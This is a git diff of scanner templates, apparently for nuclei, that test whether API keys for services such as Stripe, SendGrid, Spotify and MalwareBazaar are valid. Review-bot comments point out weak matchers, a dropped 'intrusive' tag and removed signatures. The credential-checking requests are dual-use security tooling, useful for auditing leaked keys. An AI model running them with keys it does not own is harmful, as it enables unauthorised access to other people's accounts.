diff --git a/poc/api/api-malshare.yaml b/poc/api/api-malshare.yaml new file mode 100644 index 0000000000..d486f6f0fd --- /dev/null +++ b/poc/api/api-malshare.yaml @@ -0,0 +1,24 @@ +id: api-malshare + +info: + name: MalShare API Test + author: daffainfo + severity: info + reference: + - https://malshare.com/doc.php + - https://github.com/daffainfo/all-about-apikey/blob/main/Anti%20Malware/MalShare.md + tags: token-spray,malshare + +self-contained: true +requests: + - method: GET + path: + - "https://api.malshare.com/api.php?api_key={{token}}&action=getlist" + + matchers: + - type: word + part: body + words: + - '"md5":' + - '"sha1":' + condition: and diff --git a/poc/api/api-malwarebazaar-458.yaml b/poc/api/api-malwarebazaar-458.yaml deleted file mode 100644 index ce99bd0a43..0000000000 --- a/poc/api/api-malwarebazaar-458.yaml +++ /dev/null 
@@ -1,40 +0,0 @@ -id: api-malwarebazaar - -info: - name: MalwareBazaar API Test - author: daffainfo - severity: info - reference: - - https://bazaar.abuse.ch/api/ - - https://github.com/daffainfo/all-about-apikey/blob/main/Anti-Malware/MalwareBazaar.md - tags: token-spray,malwarebazaar - -self-contained: true -requests: - - raw: - - | - POST https://mb-api.abuse.ch/api/v1 HTTP/1.1 - Host: mb-api.abuse.ch - API-KEY: {{token}} - Content-Length: 0 - Content-Type: multipart/form-data; boundary=545d0ca717a743c3bd4fa575585f74c6 - - --545d0ca717a743c3bd4fa575585f74c6 - Content-Disposition: form-data; name="json_data" - Content-Type: application/json - - {"tags": ["exe", "test"], "references": {"twitter": ["https://twitter.com/abuse_ch/status/1224269018506330112"], "malpedia": ["https://malpedia.caad.fkie.fraunhofer.de/details/win.gozi"], "joe_sandbox": ["https://www.joesecurity.org/reports/1", "https://www.joesecurity.org/reports/2"], "links": ["https://urlhaus.abuse.ch/url/306613/"], "any_run": ["https://app.any.run/tasks/1", "https://app.any.run/tasks/2"]}, "context": {"comment": "this malware sample is very nasty!", "dropped_by_md5": ["68b329da9893e34099c7d8ad5cb9c940"], "dropped_by_malware": ["Gozi"], "dropped_by_sha256": ["01ba4719c80b6fe911b091a7c05124b64eeece964e09c058ef8f9805daca546b", "4355a46b19d348dc2f57c046f8ef63d4538ebb936000f3c9ee954a27460dd865"]}, "anonymous": 1, "delivery_method": "email_attachment"} - --545d0ca717a743c3bd4fa575585f74c6 - Content-Disposition: form-data; name="file"; filename="1.txt" - - dssd - - --545d0ca717a743c3bd4fa575585f74c6-- - - matchers: - - type: word - part: body - words: - - '"query_status": "inserted"' - - '"query_status": "file_already_known"' - condition: or diff --git a/poc/api/api-malwarebazaar-459.yaml b/poc/api/api-malwarebazaar-459.yaml index 4a424faa68..f261796b92 100644 --- a/poc/api/api-malwarebazaar-459.yaml +++ b/poc/api/api-malwarebazaar-459.yaml 
@@ -4,17 +4,13 @@ info: name: MalwareBazaar API Test author: daffainfo severity: info - description: Collect and share malware samples reference: - https://bazaar.abuse.ch/api/ - - https://github.com/daffainfo/all-about-apikey/tree/main/malwarebazaar - metadata: - max-request: 1 - tags: token-spray,malwarebazaar,intrusive + - https://github.com/daffainfo/all-about-apikey/blob/main/Anti%20Malware/MalwareBazaar.md + tags: token-spray,malwarebazaar self-contained: true - -http: +requests: - raw: - | POST https://mb-api.abuse.ch/api/v1 HTTP/1.1 @@ -42,5 +38,3 @@ http: - '"query_status": "inserted"' - '"query_status": "file_already_known"' condition: or - -# digest: 4b0a00483046022100f5d19c2f0a4b8aaf9f21dd936fba07954a82d880f3c014db4faba4fb2a535538022100bf2a275e923f4190c5b7d398ac019329cdb75af155007fe5b6822fc577741533:922c64590222798bb761d5b6d8e72950 diff --git a/poc/api/api-mapbox-465.yaml b/poc/api/api-mapbox-465.yaml index 4ed5e0648f..9a4ef36abe 100644 --- a/poc/api/api-mapbox-465.yaml +++ b/poc/api/api-mapbox-465.yaml @@ -3,12 +3,16 @@ id: api-mapbox info: name: Mapbox API Test author: zzeitlin - reference: https://docs.mapbox.com/api/search/geocoding/ severity: info + reference: + - https://docs.mapbox.com/api/search/geocoding/ + metadata: + max-request: 1 tags: token-spray,mapbox self-contained: true -requests: + +http: - method: GET path: - "https://api.mapbox.com/geocoding/v5/mapbox.places/Los%20Angeles.json?access_token={{token}}" @@ -21,3 +25,5 @@ requests: - 'query' - 'features' condition: and + +# digest: 4a0a004730450220768d1ff5878050798d8823910a7a94b878f6dea320f1ddbed4d39300607ddc8b022100924963d6e43ad9e9ea39b44ecede601bf33126849ebd4e4c63b46f6479614d08:922c64590222798bb761d5b6d8e72950 diff --git a/poc/api/api-mapbox.yaml b/poc/api/api-mapbox.yaml deleted file mode 100644 index c4640d9695..0000000000 --- a/poc/api/api-mapbox.yaml +++ /dev/null 
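Review bot: The `tags:` line of api-malwarebazaar-459.yaml loses `intrusive`, yet the request is still a POST to mb-api.abuse.ch and the matcher accepts `"query_status": "inserted"`, meaning a successful submission. Going by the deleted api-malwarebazaar-458.yaml, the body uploads a sample file; the body of this file lies between the hunks and is not visible. Anyone who filters runs on the `intrusive` tag would now execute the upload unknowingly, so keep `tags: token-spray,malwarebazaar,intrusive`.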
@@ -1,19 +0,0 @@ -id: api-mapbox - -info: - name: Mapbox API Test - author: zzeitlin - reference: https://docs.mapbox.com/api/search/geocoding/ - severity: info - tags: token-spray,mapbox - -requests: - - method: GET - path: - - "https://api.mapbox.com/geocoding/v5/mapbox.places/Los%20Angeles.json?access_token={{token}}" - - matchers: - - type: status - status: - - 401 - negative: true diff --git a/poc/api/api-mojoauth-466.yaml b/poc/api/api-mojoauth-466.yaml deleted file mode 100644 index 85c9820f23..0000000000 --- a/poc/api/api-mojoauth-466.yaml +++ /dev/null @@ -1,33 +0,0 @@ -id: api-mojoauth - -info: - name: MojoAuth API Test - author: daffainfo - severity: info - description: Secure and modern passwordless authentication platform - reference: - - https://mojoauth.com/docs/ - - https://github.com/daffainfo/all-about-apikey/tree/main/mojoauth - metadata: - max-request: 1 - tags: token-spray,mojoauth - -self-contained: true - -http: - - raw: - - | - POST https://api.mojoauth.com/token/jwks HTTP/1.1 - Host: api.mojoauth.com - X-API-Key: {{token}} - - matchers: - - type: word - part: body - words: - - '"keys"' - - '"kty"' - - '"kid"' - condition: and - -# digest: 4a0a0047304502200506d39f1578c027a21bc88f89e4c08aeb679ca01db946d0b2bfb56e7d8c615d022100b6123ee1887fe67d62e526c14ad9b4bd755d1727085a16877bbb8b59651f33ba:922c64590222798bb761d5b6d8e72950 diff --git a/poc/api/api-mojoauth.yaml b/poc/api/api-mojoauth.yaml new file mode 100644 index 0000000000..db56c9a9bc --- /dev/null +++ b/poc/api/api-mojoauth.yaml 
@@ -0,0 +1,28 @@ +id: api-mojoauth + +info: + name: MojoAuth API Test + author: daffainfo + severity: info + description: Secure and modern passwordless authentication platform + reference: + - https://mojoauth.com/docs/ + - https://github.com/daffainfo/all-about-apikey/tree/main/mojoauth + tags: token-spray,mojoauth + +self-contained: true +requests: + - raw: + - | + POST https://api.mojoauth.com/token/jwks HTTP/1.1 + Host: api.mojoauth.com + X-API-Key: {{token}} + + matchers: + - type: word + part: body + words: + - '"keys"' + - '"kty"' + - '"kid"' + condition: and diff --git a/poc/api/api-mywot-467.yaml b/poc/api/api-mywot-467.yaml index 6f1f3daaf1..2440afe842 100644 --- a/poc/api/api-mywot-467.yaml +++ b/poc/api/api-mywot-467.yaml @@ -4,17 +4,13 @@ info: name: My Web of Trust API author: daffainfo severity: info - description: IP/domain/URL reputation reference: - https://support.mywot.com/hc/en-us/sections/360004477734-API- - - https://github.com/daffainfo/all-about-apikey/tree/main/web-of-trust - metadata: - max-request: 1 + - https://github.com/daffainfo/all-about-apikey/blob/main/Anti-Malware/Web%20of%20Trust.md tags: token-spray,weboftrust self-contained: true - -http: +requests: - raw: - | GET https://scorecard.api.mywot.com/v3/targets?t=hbo.com&t=google.com HTTP/1.1 @@ -29,5 +25,3 @@ http: - '"target":' - '"safety":' condition: and - -# digest: 490a00463044022050822dedbfa563ddf5000add7b851539b264a5b3a2b59a8669ea936e869c9b4802207ada282ba59cbc6034abd040b87aca4b296b655d7de41e31af8297ebae4bf2f9:922c64590222798bb761d5b6d8e72950 diff --git a/poc/api/api-mywot-468.yaml b/poc/api/api-mywot-468.yaml deleted file mode 100644 index 7256c5d9e8..0000000000 --- a/poc/api/api-mywot-468.yaml +++ /dev/null 
@@ -1,27 +0,0 @@ -id: api-mywot - -info: - name: My Web of Trust API - author: daffainfo - severity: info - reference: - - https://support.mywot.com/hc/en-us/sections/360004477734-API- - - https://github.com/daffainfo/all-about-apikey/blob/main/Anti%20Malware/Web%20of%20Trust.md - tags: token-spray,weboftrust - -self-contained: true -requests: - - raw: - - | - GET https://scorecard.api.mywot.com/v3/targets?t=hbo.com&t=google.com HTTP/1.1 - Host: scorecard.api.mywot.com - x-user-id: {{id}} - x-api-key: {{token}} - - matchers: - - type: word - part: body - words: - - '"target":' - - '"safety":' - condition: and diff --git a/poc/api/api-netlify-470.yaml b/poc/api/api-netlify-470.yaml deleted file mode 100644 index fd4aacbc89..0000000000 --- a/poc/api/api-netlify-470.yaml +++ /dev/null @@ -1,31 +0,0 @@ -id: api-netlify - -info: - name: Netlify API Test - author: dwisiswant0 - severity: info - reference: - - https://docs.netlify.com/api/get-started/ - metadata: - max-request: 1 - tags: token-spray,netlify - -self-contained: true - -http: - - method: GET - path: - - "https://api.netlify.com/api/v1/sites" - - headers: - Authorization: Bearer {{token}} - matchers: - - type: word - part: body - words: - - '"id":' - - '"premium":' - - '"claimed":' - condition: and - -# digest: 4a0a0047304502207e42d56f08b8711aa9e2dc68c1f03484bcbffd91ca75cb894339fcf576a0f8b3022100b30d2ae584362d29f0e05772a69ed14161d80a266266ac43269a1be95e9eb013:922c64590222798bb761d5b6d8e72950 diff --git a/poc/api/api-netlify.yaml b/poc/api/api-netlify.yaml new file mode 100644 index 0000000000..e57127c9f5 --- /dev/null +++ b/poc/api/api-netlify.yaml 
@@ -0,0 +1,25 @@ +id: api-netlify + +info: + name: Netlify API Test + author: dwisiswant0 + severity: info + reference: https://docs.netlify.com/api/get-started/ + tags: token-spray,netlify + +self-contained: true +requests: + - method: GET + path: + - "https://api.netlify.com/api/v1/sites" + headers: + Authorization: Bearer {{token}} + + matchers: + - type: word + part: body + words: + - '"id":' + - '"premium":' + - '"claimed":' + condition: and diff --git a/poc/api/api-openweather-473.yaml b/poc/api/api-openweather-473.yaml index 13a26aecc3..1a9a5058e3 100644 --- a/poc/api/api-openweather-473.yaml +++ b/poc/api/api-openweather-473.yaml @@ -3,21 +3,16 @@ id: api-openweather info: name: OpenWeather API Test author: zzeitlin - severity: info reference: https://openweathermap.org/current + severity: info tags: token-spray,weather,openweather -self-contained: true requests: - method: GET path: - "https://api.openweathermap.org/data/2.5/weather?q=Chicago&appid={{token}}" matchers: - - type: word - part: body - words: - - '"coord":' - - '"weather":' - - '"base":' - condition: and + - type: status + status: + - 200 diff --git a/poc/api/api-openweather.yaml b/poc/api/api-openweather.yaml deleted file mode 100644 index 1a9a5058e3..0000000000 --- a/poc/api/api-openweather.yaml +++ /dev/null @@ -1,18 +0,0 @@ -id: api-openweather - -info: - name: OpenWeather API Test - author: zzeitlin - reference: https://openweathermap.org/current - severity: info - tags: token-spray,weather,openweather - -requests: - - method: GET - path: - - "https://api.openweathermap.org/data/2.5/weather?q=Chicago&appid={{token}}" - - matchers: - - type: status - status: - - 200 diff --git a/poc/api/api-pagerduty.yaml b/poc/api/api-pagerduty-475.yaml similarity index 100% rename from poc/api/api-pagerduty.yaml rename to poc/api/api-pagerduty-475.yaml diff --git a/poc/api/api-pendo.yaml b/poc/api/api-pendo.yaml new file mode 100644 index 0000000000..8ea141bcc0 --- /dev/null +++ b/poc/api/api-pendo.yaml 
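Review bot: The matcher in api-openweather-473.yaml goes from three body words (`"coord":`, `"weather":`, `"base":`) to a bare `status: 200`, so any 200 response, including a page served by an intermediary, counts as a valid key. I would keep the word matcher with `condition: and`, or combine it with the status check under `matchers-condition: and`.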
@@ -0,0 +1,23 @@
+id: api-pendo
+
+info:
+ name: Pendo API Test
+ author: zzeitlin
+ reference: https://help.pendo.io/resources/support-library/api/index.html
+ severity: info
+ tags: token-spray,pendo
+
+requests:
+ - method: GET
+ path:
+ - "https://app.pendo.io/api/v1/feature"
+ - "https://app.pendo.io/api/v1/metadata/schema/account"
+ headers:
+ Content-Type: application/json
+ X-Pendo-Integration-Key: "{{token}}"
+
+ matchers:
+ - type: status
+ status:
+ - 403
+ negative: true
\ No newline at end of file
diff --git a/poc/api/api-petfinder-480.yaml b/poc/api/api-petfinder-480.yaml
new file mode 100644
index 0000000000..7067e2d97a
--- /dev/null
+++ b/poc/api/api-petfinder-480.yaml
@@ -0,0 +1,36 @@
+id: api-petfinder
+
+info:
+ name: Petfinder API Test
+ author: daffainfo
+ severity: info
+ description: Petfinder is dedicated to helping pets find homes, another resource to get pets adopted
+ reference:
+ - https://www.petfinder.com/developers/v2/docs/
+ - https://github.com/daffainfo/all-about-apikey/tree/main/petfinder
+ metadata:
+ max-request: 1
+ tags: token-spray,petfinder
+
+self-contained: true
+
+http:
+ - raw:
+ - |
+ POST https://api.petfinder.com/v2/oauth2/token HTTP/1.1
+ Host: api.petfinder.com
+ Content-Type: application/x-www-form-urlencoded
+ Content-Length: 81
+
+ grant_type=client_credentials&client_id={{id}}&client_secret={{secret}}
+
+ matchers:
+ - type: word
+ part: body
+ words:
+ - '"token_type"'
+ - '"expires_in"'
+ - '"access_token"'
+ condition: and
+
+# digest: 490a0046304402205df678454684e798c9f3bfe4c88e7b86a5fe36217b85109635c57b13df65cbc702202539e9116f2321678f5c72b1f510e253761d1e1c425ee6cd15fcdc3bac2f77e5:922c64590222798bb761d5b6d8e72950
diff --git a/poc/api/api-petfinder.yaml b/poc/api/api-petfinder.yaml
deleted file mode 100644
index ae0b6866a1..0000000000
--- a/poc/api/api-petfinder.yaml
+++ /dev/null
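Review bot: `Content-Length: 81` is hard-coded in the raw request of api-petfinder-480.yaml, but the body contains `{{id}}` and `{{secret}}`, whose substituted length will rarely come to 81 bytes. If the engine sends the header as written, the token endpoint may truncate or reject the body and a valid credential pair would be reported as invalid; I would drop the line and let the client compute it. The template also takes `id` and `secret` rather than `token`, which deserves a sentence in `description:`.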
@@ -1,31 +0,0 @@ -id: api-petfinder - -info: - name: Petfinder API Test - author: daffainfo - severity: info - description: Petfinder is dedicated to helping pets find homes, another resource to get pets adopted - reference: - - https://www.petfinder.com/developers/v2/docs/ - - https://github.com/daffainfo/all-about-apikey/tree/main/petfinder - tags: token-spray,petfinder - -self-contained: true -requests: - - raw: - - | - POST https://api.petfinder.com/v2/oauth2/token HTTP/1.1 - Host: api.petfinder.com - Content-Type: application/x-www-form-urlencoded - Content-Length: 81 - - grant_type=client_credentials&client_id={{id}}&client_secret={{secret}} - - matchers: - - type: word - part: body - words: - - '"token_type"' - - '"expires_in"' - - '"access_token"' - condition: and diff --git a/poc/api/api-pivotaltracker.yaml b/poc/api/api-pivotaltracker-482.yaml similarity index 100% rename from poc/api/api-pivotaltracker.yaml rename to poc/api/api-pivotaltracker-482.yaml diff --git a/poc/api/api-postmark-483.yaml b/poc/api/api-postmark-483.yaml deleted file mode 100644 index b9bec134db..0000000000 --- a/poc/api/api-postmark-483.yaml +++ /dev/null @@ -1,26 +0,0 @@ -id: api-postmark - -info: - name: PostMark API Test - author: zzeitlin - severity: info - reference: https://postmarkapp.com/developer/api/overview - tags: token-spray,postmark - -self-contained: true -requests: - - method: GET - path: - - "https://api.postmarkapp.com/server" - headers: - Accept: application/json - X-Postmark-Server-Token: "{{token}}" - - matchers: - - type: word - part: body - words: - - '"ID":' - - '"Name":' - - '"ApiTokens":' - condition: and diff --git a/poc/api/api-postmark.yaml b/poc/api/api-postmark.yaml index 5b5aead0dc..b9bec134db 100644 --- a/poc/api/api-postmark.yaml +++ b/poc/api/api-postmark.yaml 
@@ -3,19 +3,24 @@ id: api-postmark info: name: PostMark API Test author: zzeitlin - reference: https://postmarkapp.com/developer/api/overview severity: info + reference: https://postmarkapp.com/developer/api/overview tags: token-spray,postmark +self-contained: true requests: - method: GET path: - - "https://api.postmarkapp.com/stats/outbound" + - "https://api.postmarkapp.com/server" headers: Accept: application/json X-Postmark-Server-Token: "{{token}}" matchers: - - type: status - status: - - 200 + - type: word + part: body + words: + - '"ID":' + - '"Name":' + - '"ApiTokens":' + condition: and diff --git a/poc/api/api-rijksmuseum.yaml b/poc/api/api-rijksmuseum.yaml deleted file mode 100644 index 11327595a7..0000000000 --- a/poc/api/api-rijksmuseum.yaml +++ /dev/null @@ -1,25 +0,0 @@ -id: api-rijksmuseum - -info: - name: Rijksmuseum API Test - author: daffainfo - severity: info - reference: - - https://data.rijksmuseum.nl/user-generated-content/api/ - - https://github.com/daffainfo/all-about-apikey/blob/main/Art%20Design/Rijksmuseum.md - tags: token-spray,rijksmuseum - -self-contained: true -requests: - - method: GET - path: - - "https://www.rijksmuseum.nl/api/nl/usersets?key={{token}}&format=json&page=2" - - matchers: - - type: word - part: body - words: - - '"count":' - - '"userSets":' - - '"user":' - condition: and diff --git a/poc/api/api-scanii-487.yaml b/poc/api/api-scanii-487.yaml index 9c9b50f9e0..237f5e82dd 100644 --- a/poc/api/api-scanii-487.yaml +++ b/poc/api/api-scanii-487.yaml 
@@ -4,13 +4,17 @@ info: name: Scanii API Test author: daffainfo severity: info + description: Simple REST API that can scan submitted documents/files for the presence of threats reference: - https://docs.scanii.com/v2.1/resources.html - - https://github.com/daffainfo/all-about-apikey/blob/main/Anti%20Malware/Scanii.md + - https://github.com/daffainfo/all-about-apikey/tree/main/scanii + metadata: + max-request: 1 tags: token-spray,scanii self-contained: true -requests: + +http: - raw: - | GET https://api.scanii.com/v2.1/ping HTTP/1.1 @@ -24,3 +28,5 @@ requests: - '"key"' - '"message" : "pong"' condition: and + +# digest: 4a0a00473045022078f825c2797fe08f026fddaa434bd3b1841c0692a1bf603fd611ea755c3dd2c9022100b3a0b85cdd13e42a0cfd47d5cce8339db6615475a64ad404ab873801fd4874a8:922c64590222798bb761d5b6d8e72950 diff --git a/poc/api/api-scanii-488.yaml b/poc/api/api-scanii-488.yaml new file mode 100644 index 0000000000..9c9b50f9e0 --- /dev/null +++ b/poc/api/api-scanii-488.yaml @@ -0,0 +1,26 @@ +id: api-scanii + +info: + name: Scanii API Test + author: daffainfo + severity: info + reference: + - https://docs.scanii.com/v2.1/resources.html + - https://github.com/daffainfo/all-about-apikey/blob/main/Anti%20Malware/Scanii.md + tags: token-spray,scanii + +self-contained: true +requests: + - raw: + - | + GET https://api.scanii.com/v2.1/ping HTTP/1.1 + Authorization: Basic {{base64(api + ':' + secret)}} + Host: api.scanii.com + + matchers: + - type: word + part: body + words: + - '"key"' + - '"message" : "pong"' + condition: and diff --git a/poc/api/api-sendgrid-489.yaml b/poc/api/api-sendgrid-489.yaml deleted file mode 100644 index 3c24d1dfaf..0000000000 --- a/poc/api/api-sendgrid-489.yaml +++ /dev/null 
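Review bot: The added `poc/api/api-scanii-488.yaml` carries blob `9c9b50f9e0`, which is the pre-image of `api-scanii-487.yaml` in this same commit, so the tree ends up holding both the old and the updated revision of what appears to be the same template. The copy keeps the legacy `requests:` key and the old reference URL, and has no `metadata: max-request` or `# digest:` line. Running both would send the same credential check twice and report it twice; I would drop the `-488` file or give it the `-487` content. `api-sonarcloud.yaml` and `api-wakatime.yaml` are added the same way, from the old blobs of their `-494` and `-514` siblings.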
@@ -1,23 +0,0 @@ -id: api-sendgrid - -info: - name: Sendgrid API Test - author: zzeitlin - severity: info - reference: https://docs.sendgrid.com/for-developers/sending-email/getting-started-smtp - tags: token-spray,sendgrid - -self-contained: true -network: - - inputs: - - data: "ehlo\r\n" - read: 1024 - - data: "AUTH PLAIN {{base64(hex_decode('00')+'apikey'+hex_decode('00')+token)}}\r\n" - read: 1024 - host: - - "tls://smtp.sendgrid.net:465" - - matchers: - - type: word - words: - - "Authentication successful" diff --git a/poc/api/api-sendgrid.yaml b/poc/api/api-sendgrid.yaml index 3bf3692649..3c24d1dfaf 100644 --- a/poc/api/api-sendgrid.yaml +++ b/poc/api/api-sendgrid.yaml @@ -4,25 +4,20 @@ info: name: Sendgrid API Test author: zzeitlin severity: info - reference: - - https://docs.sendgrid.com/for-developers/sending-email/getting-started-smtp - metadata: - max-request: 1 + reference: https://docs.sendgrid.com/for-developers/sending-email/getting-started-smtp tags: token-spray,sendgrid self-contained: true -tcp: +network: - inputs: - data: "ehlo\r\n" read: 1024 - - data: "AUTH PLAIN {{base64(hex_decode('00')+'apikey'+hex_decode('00')+token)}}\r\n" read: 1024 host: - "tls://smtp.sendgrid.net:465" + matchers: - type: word words: - "Authentication successful" - -# digest: 4b0a004830460221008e0e74cc516e39557ab0c6778b54c5057b78391e494874ccb1cb0affe9888d67022100892b564dc499c64d59217eb15a6fdecdf2c0b5873366ee7093b857e2a2b43e92:922c64590222798bb761d5b6d8e72950 diff --git a/poc/api/api-slack-493.yaml b/poc/api/api-slack.yaml similarity index 100% rename from poc/api/api-slack-493.yaml rename to poc/api/api-slack.yaml diff --git a/poc/api/api-sonarcloud-494.yaml b/poc/api/api-sonarcloud-494.yaml index fdf0dc6724..97831db0bd 100644 --- a/poc/api/api-sonarcloud-494.yaml +++ b/poc/api/api-sonarcloud-494.yaml 
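Review bot: The `api-sendgrid.yaml` hunk removes the `# digest:` trailer together with `metadata: max-request: 1` and renames `tcp:` back to `network:`, so the new side is an older, unsigned revision of the template. If the digest is the template signature, as its format suggests, consumers can no longer verify that the file is unmodified before running it with a live API key. I would keep the signed revision, or re-sign after editing. The same trailer is dropped in the `api-virustotal-512.yaml`, `api-wordcloud-518.yaml`, `apiman-panel-460.yaml`, `bems-api-lfi-711.yaml`, `etcd-unauthenticated-api.yaml` and `exposed-docker-api-7299.yaml` hunks.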
@@ -3,10 +3,11 @@ id: api-sonarcloud info: name: SonarCloud API Test author: zzeitlin - reference: https://sonarcloud.io/web_api/api/authentication severity: info + reference: https://sonarcloud.io/web_api/api/authentication tags: token-spray,sonarcloud +self-contained: true requests: - method: GET path: @@ -18,4 +19,4 @@ requests: - type: word part: body words: - - 'true' + - '{"valid": true}' diff --git a/poc/api/api-sonarcloud.yaml b/poc/api/api-sonarcloud.yaml new file mode 100644 index 0000000000..fdf0dc6724 --- /dev/null +++ b/poc/api/api-sonarcloud.yaml @@ -0,0 +1,21 @@ +id: api-sonarcloud + +info: + name: SonarCloud API Test + author: zzeitlin + reference: https://sonarcloud.io/web_api/api/authentication + severity: info + tags: token-spray,sonarcloud + +requests: + - method: GET + path: + - "https://sonarcloud.io/api/authentication/validate" + headers: + Authorization: Basic {{base64(token + ':')}} + + matchers: + - type: word + part: body + words: + - 'true' diff --git a/poc/api/api-spotify-495.yaml b/poc/api/api-spotify-495.yaml deleted file mode 100644 index 0f3cbc620d..0000000000 --- a/poc/api/api-spotify-495.yaml +++ /dev/null @@ -1,31 +0,0 @@ -id: api-spotify - -info: - name: Spotify API Test - author: zzeitlin - severity: info - reference: - - https://developer.spotify.com/documentation/general/guides/authorization-guide/ - metadata: - max-request: 1 - tags: token-spray,spotify - -self-contained: true - -http: - - method: GET - path: - - "https://api.spotify.com/v1/me/player/devices" - - headers: - Authorization: Bearer {{token}} - matchers: - - type: word - part: body - words: - - '"devices":' - - '"id":' - - '"is_active":' - condition: and - -# digest: 4a0a00473045022100bfa9c51c453212bb217cccd26bd38e3a08368404e2fd3bd84800c76f4f3c0b8302207b37fcf4fb39b559417a5abc293f8a654383e066302f942d53e186707a6572dc:922c64590222798bb761d5b6d8e72950 diff --git a/poc/api/api-spotify.yaml b/poc/api/api-spotify.yaml new file mode 100644 index 0000000000..ee518e36b4 
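Review bot: The new matcher word `'{"valid": true}'` in the second `api-sonarcloud-494.yaml` hunk only matches when the response is serialised with exactly one space after the colon. The diff does not show the server's formatting; if it returns compact JSON the template never fires and a valid token goes unreported. A `type: regex` matcher with `- '"valid":\s*true'` would tolerate either form.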
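Review bot: The matcher in the added `api-sonarcloud.yaml` is the single word `'true'`, which any response body containing that string satisfies, including an unrelated JSON boolean or an error page, so an invalid token can be reported as valid. The file also lacks `self-contained: true` although its path is an absolute URL. The `api-sonarcloud-494.yaml` hunk in this commit already makes both changes; they belong here as well, or the file should not be added.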
--- /dev/null +++ b/poc/api/api-spotify.yaml @@ -0,0 +1,25 @@ +id: api-spotify + +info: + name: Spotify API Test + author: zzeitlin + severity: info + reference: https://developer.spotify.com/documentation/general/guides/authorization-guide/ + tags: token-spray,spotify + +self-contained: true +requests: + - method: GET + path: + - "https://api.spotify.com/v1/me/player/devices" + headers: + Authorization: Bearer {{token}} + + matchers: + - type: word + part: body + words: + - '"devices":' + - '"id":' + - '"is_active":' + condition: and \ No newline at end of file diff --git a/poc/api/api-square-496.yaml b/poc/api/api-square.yaml similarity index 100% rename from poc/api/api-square-496.yaml rename to poc/api/api-square.yaml diff --git a/poc/api/api-sslmate-497.yaml b/poc/api/api-sslmate-497.yaml deleted file mode 100644 index fb16c14d37..0000000000 --- a/poc/api/api-sslmate-497.yaml +++ /dev/null @@ -1,33 +0,0 @@ -id: api-sslmate - -info: - name: SSLMate API Test - author: 0ri2N - severity: info - reference: - - https://sslmate.com - - https://sslmate.com/help/ - - https://sslmate.com/help/reference/apiv2 - metadata: - max-request: 1 - tags: recon,sslmate,token-spray - -self-contained: true - -http: - - method: GET - path: - - https://sslmate.com/api/v2/certs/interact.sh?expand=current.crt - - headers: - Authorization: Bearer {{token}} - matchers: - - type: word - part: body - words: - - '"exists"' - - '"wildcard"' - - '"auto_renew"' - condition: and - -# digest: 4b0a00483046022100f525c91b3e36151f292b0cb01a0b9ad0bf6dd0f6088aafbc251e3dc1b0d969a5022100e5dd93fe9b0cc75f56993b261f9b495cf086391c542d615a0edcf3d297075431:922c64590222798bb761d5b6d8e72950 diff --git a/poc/api/api-sslmate.yaml b/poc/api/api-sslmate.yaml new file mode 100644 index 0000000000..940d325e12 --- /dev/null +++ b/poc/api/api-sslmate.yaml 
@@ -0,0 +1,28 @@ +id: api-sslmate + +info: + name: SSLMate API Test + author: 0ri2N + severity: info + reference: + - https://sslmate.com + - https://sslmate.com/help/ + - https://sslmate.com/help/reference/apiv2 + tags: dns,ssl,recon,sslmate,token-spray + +self-contained: true +requests: + - method: GET + path: + - https://sslmate.com/api/v2/certs/example.com?expand=current.crt + headers: + Authorization: Bearer {{token}} + + matchers: + - type: word + part: body + words: + - '"exists"' + - '"wildcard"' + - '"auto_renew"' + condition: and diff --git a/poc/api/api-stripe-499.yaml b/poc/api/api-stripe-499.yaml deleted file mode 100644 index d06b38bd8c..0000000000 --- a/poc/api/api-stripe-499.yaml +++ /dev/null @@ -1,25 +0,0 @@ -id: api-stripe - -info: - name: Stripe API Test - author: zzeitlin - severity: info - reference: https://stripe.com/docs/api/authentication - tags: token-spray,stripe - -self-contained: true -requests: - - method: GET - path: - - "https://api.stripe.com/v1/charges" - headers: - Authorization: Basic {{base64(token + ':')}} - - matchers: - - type: word - part: body - words: - - '"object":' - - '"url":' - - '"data":' - condition: and \ No newline at end of file diff --git a/poc/api/api-stripe.yaml b/poc/api/api-stripe.yaml index 16e358e75a..d06b38bd8c 100644 --- a/poc/api/api-stripe.yaml +++ b/poc/api/api-stripe.yaml @@ -3,10 +3,11 @@ id: api-stripe info: name: Stripe API Test author: zzeitlin - reference: https://stripe.com/docs/api/authentication severity: info + reference: https://stripe.com/docs/api/authentication tags: token-spray,stripe +self-contained: true requests: - method: GET path: @@ -15,6 +16,10 @@ requests: Authorization: Basic {{base64(token + ':')}} matchers: - - type: status - status: - - 200 + - type: word + part: body + words: + - '"object":' + - '"url":' + - '"data":' + condition: and \ No newline at end of file 
diff --git a/poc/api/api-taiga-501.yaml b/poc/api/api-taiga-501.yaml deleted file mode 100644 index 813c76f3ea..0000000000 --- a/poc/api/api-taiga-501.yaml +++ /dev/null @@ -1,30 +0,0 @@ -id: api-taiga - -info: - name: Taiga API Test - author: dwisiswant0 - severity: info - reference: - - https://docs.taiga.io/api.html - metadata: - max-request: 1 - tags: token-spray,taiga - -self-contained: true - -http: - - method: GET - path: - - "https://api.taiga.io/api/v1/application-tokens" - - headers: - Authorization: Bearer {{token}} - matchers: - - type: word - part: body - words: - - '"auth_code":' - - '"state":' - condition: and - -# digest: 4b0a00483046022100bf3ead9df9b8a73d035d356ac82460543b9f33a6ba786736564746301d5c75b1022100a498eba13eb325a9e2ecf7d1fe784b5598bb024e888df4601a928c19c9bb2f16:922c64590222798bb761d5b6d8e72950 diff --git a/poc/api/api-taiga.yaml b/poc/api/api-taiga.yaml new file mode 100644 index 0000000000..6e8748bdf1 --- /dev/null +++ b/poc/api/api-taiga.yaml @@ -0,0 +1,24 @@ +id: api-taiga + +info: + name: Taiga API Test + author: dwisiswant0 + reference: https://docs.taiga.io/api.html + severity: info + tags: token-spray,taiga + +self-contained: true +requests: + - method: GET + path: + - "https://api.taiga.io/api/v1/application-tokens" + headers: + Authorization: Bearer {{token}} + + matchers: + - type: word + part: body + words: + - '"auth_code":' + - '"state":' + condition: and diff --git a/poc/api/api-thecatapi-502.yaml b/poc/api/api-thecatapi-502.yaml deleted file mode 100644 index 5c689a18b9..0000000000 --- a/poc/api/api-thecatapi-502.yaml +++ /dev/null 
